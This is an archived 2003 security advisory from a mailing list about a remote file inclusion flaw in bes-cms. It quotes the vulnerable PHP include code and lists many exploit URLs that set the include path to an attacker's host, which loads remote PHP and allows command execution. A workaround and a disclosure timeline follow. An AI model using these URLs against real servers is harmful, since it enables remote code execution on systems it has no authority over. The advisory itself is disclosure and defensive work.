[UNIX] BES-CMS File Inclusion Vulnerability

• Previous message: SecuriTeam: "[EXPL] phpBB SQL Injection Exploit Code (search_id)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 22 Dec 2003 15:23:27 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  BES-CMS File Inclusion Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://bes.h6p.org> bes-cms is "a professional dynamic php website
building tool. It was developed at mokka by a bored programmer. Bes-cms is
capable of creating images galleries, message boards, news sections
download sections contact sections and many more to be added on the plugin
server". A vulnerability has been discovered in bes-cms that allows remote
attackers to cause the script to include arbitrary PHP code (allows remote
command execution).

DETAILS

Vulnerable systems:
 * bes-cms version 0.4 rc3
 * bes-cms version 0.5 rc3

Immune systems:
 * bes-cms version 0.5 rc4

In the files:
 * index.inc.php
 * Members/index.inc.php
 * Members/root/index.inc.php

We can see the following code:
include_once($PATH__Includes."actions_default.php");

In the Include/functions_folder.php file :
include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');

In the Include/functions_hacking.php file :
switch($_GET['itemID'])
{
 case 'usershow':
 include_once("".$PATH__Includes."functions_user.php");
 Show_USer_Details($_GET['user']);
 break;
 [...]
 case 'send_bug':
 if ($UserDetails['LOGGED_IN'] == 'YES')
 {
 global $PATH__Includes;
 include_once("".$PATH__Includes."functions_error.php");
 send_bug_report();
 }
break;
[...]
case 'content_view':
global $PATH___Includes;
include_once("".$PATH__Includes."functions_message_docTypes.php");
Message_Centent_View($Plugin_Path);
break;

case 'logger':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_users.php");
Loggin_Message();
break;

case 'search':
global $PATH__Includes;
include_once("".$PATH__Includes."functions_general.php");
Display_Search_Results($_POST['search_str']);
break;
[...]

In the Include/functions_message.php file:
include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');

In addition, in the Include/Start.php file:
include_once($inc_path."Include/vars.php");

Making all these files vulnerable. We can see that all inclusions of file
begin by a indefinite variable in the code ($inc_path or $PATH_Includes)
and so could be definite by an attacker.

Exploits:
If register_globals=ON has been marked we can exploit any of the below
URLs to cause it to include external files.

The following URLs will cause the server to include external files:
http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/

The requested file will be http://[attacker]/actions_default.php.

The following URL will cause the server to include:
http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/

The requested files will be
http://[attacker]/functions_folder_modules.php,
http://[attacker]/functions_folder_plugins.php,
http://[attacker]/functions_folder_files.php.

The following URLs will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger

The requested file will be http://[attacker]/functions_user.php

The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES

The requested file will be http://[attacker]/functions_error.php.

The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view.

The requested file will be
http://[attacker]/functions_message_docTypes.php.

The following URL will cause the server to include external files:
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search

The requested file will be http://[attacker]/functions_general.php.

The following URL will cause the server to include external files:
http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/.

The requested files will be
http://[attacker]/functions_message_docTypes.php,
http://[attacker]/functions_message_edit.php.

The following URL will cause the server to include external files:
http://[target]/Include/Start.php?inc_path=http://[attacker]/

The requested file will be http://[attacker]/Include/vars.php.

Solution:
The creator was notified, and has created an immune version (version 0.5
rc4).

Workaround:
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php simply add the following line as the first
line:

if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
}

And at the begining of the Include/Start.php file, add the following line
as the first line:
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }

Disclosure timeline:
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure

ADDITIONAL INFORMATION

The information has been provided by
<mailto:frog-man@security-corporation.com> frog-m@n.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] phpBB SQL Injection Exploit Code (search_id)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]